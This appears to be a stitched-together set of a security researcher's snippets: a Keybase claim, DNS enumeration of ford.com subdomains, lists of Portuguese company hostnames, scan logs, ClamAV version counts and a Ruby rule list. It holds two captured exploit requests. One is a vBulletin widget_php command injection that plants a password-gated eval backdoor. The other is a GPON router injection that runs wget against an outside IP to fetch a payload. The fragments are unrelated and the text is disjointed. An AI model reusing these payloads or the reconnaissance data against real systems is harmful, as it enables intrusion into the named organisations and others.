I hereby claim:
- I am balgan on github.
- I am balgan (https://keybase.io/balgan) on keybase.
- I have a public key whose fingerprint is BD0A 2C9A AAEF 8204 44D0 E119 00CD C6A5 B6B6 6C1D
To claim this, I am signing this object:
{"query": "ford.com", "total": 8371, "events": [{"fqdn": "pah482.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.66.136.240"}]}]}, {"fqdn": "pah480.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.82.167.161"}]}]}, {"fqdn": "fmms-vip-chicago_prod.chi.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.48.44"}]}]}, {"fqdn": "dnschi1.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.17.20"}]}]}, {"fqdn": "wwwqa.wslb2be.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.58.62"}]}]}, {"fqdn": "wwwdevalt2.redfocb.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.50.47"}]}]}, {"fqdn": "pah235.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.171.18.23"}]}]}, {"fqdn": "wwwqamg16.frv.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.81.51"}]}]}, {"fqdn": "web-competencycenter-vip-ashburn_prod.ash.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.64.52"}]}]}, {"fqdn": "webedum |
POST/index.php?routestring=ajax/render/widget_phpHTTP/1.1\\r\\nHost:XX.XX.XX.XX\\r\\nUser-Agent:Mozilla/5.0(Linux;Android9;MHA-AL00Build/HUAWEIMHA-AL00;wv)AppleWebKit/537.36(KHTML,likeGecko)Version/4.0Chrome/71.0.3578.99MobileSafari/537.36MMWEBID/9772MicroMessenger/7.0.6.1460(0x27000634)Process/toolsNetType/WIFILanguage/zh_CN\\r\\nContent-Length:378\\r\\nContent-Type:application/x-www-form-urlencoded\\r\\nAccept-Encoding:gzip\\r\\n\\r\\nwidgetConfig[code]=echo+shell_exec('sed+-i+\'s/eval(\$code);/if+(isset(\$_REQUEST[\"epass\"])+\&\&+\$_REQUEST[\"epass\"]+==+\"2dmfrb28nu3c6s9j\")+{+eval(\$code);+}/g\'+includes/vb5/frontend/controller/bbcode.php+&&+echo+-n+exploited+|+md5sum');+exit;" |
"EUVNET.EUROVIDA.PT" | |
"GYM2020.tranquilidade.pt" | |
"acoreanaseguros.pt" | |
"adcv.sibs.pt" | |
"agentes.ptempresas.pt" | |
"airw.bancobpi.pt" | |
"ajuda.multicert.com" | |
"alice.atlantico.eu" | |
"analytics.sibs.pt" | |
"aosaINTsvcs.jetblue.com" |
{"origin": {"country": "uk", "type": "port", "ts": 1540139424341}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
{"origin": {"country": "uk", "type": "port", "ts": 1539868097719}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
{"origin": {"country": "in", "type": "port", "ts": 1538559261431}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
{"origin": {"country": "ca", "type": "port", "ts": 1538558926961}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
{"origin": {"country": "nl", "type": "port", "ts": 1538076253390}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
{"origin": {"country": "us", "type": "service-simple", "ts": 1540164006070}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": {"data": {"service": {"version": "2.4.33", "product": "Apache httpd", "cpe": ["cpe:/a:apache:http_server:2.4.33", |
# of unique ips scanning last 30 days | |
4201 | |
# of connections | |
@timestamp per day Count | |
August 29th 2018, 00:00:00.000 17,837 | |
August 30th 2018, 00:00:00.000 24,870 | |
August 31st 2018, 00:00:00.000 16,542 | |
September 1st 2018, 00:00:00.000 16,033 | |
September 2nd 2018, 00:00:00.000 11,127 |
POST /GponForm/diag_Form?images/ HTTP/1.1\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\r\\nHost: 178.62.43.33:80\\r\\nContent-Type: text/plain\\r\\nContent-length: 119\\r\\n\\r\\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0 |
5642 | |
1 ClamAV 0.80/1168/Fri | |
2 ClamAV 0.80/5521/Wed | |
1 ClamAV 0.80rc3/510/Thu | |
2 ClamAV 0.83/8762/Mon | |
2 ClamAV 0.86.2/989/Sat | |
4 ClamAV 0.87/1082/Wed | |
2 ClamAV 0.88.2/1428/Thu | |
1 ClamAV 0.88.6/8082/Sun | |
1 ClamAV 0.88/1579/Sat |
I hereby claim:
To claim this, I am signing this object:
root@ubuntu:/home/balgan/sourceradar# ruby RuleSync.rb Ruby | |
!!Loading rules for Ruby!! | |
mail_to :encode => :javascript | |
FileUtils.remove_entry_secure | |
$SAFE | |
limit | |
BigDecimal | |
strip_tag | |
JSON.parse |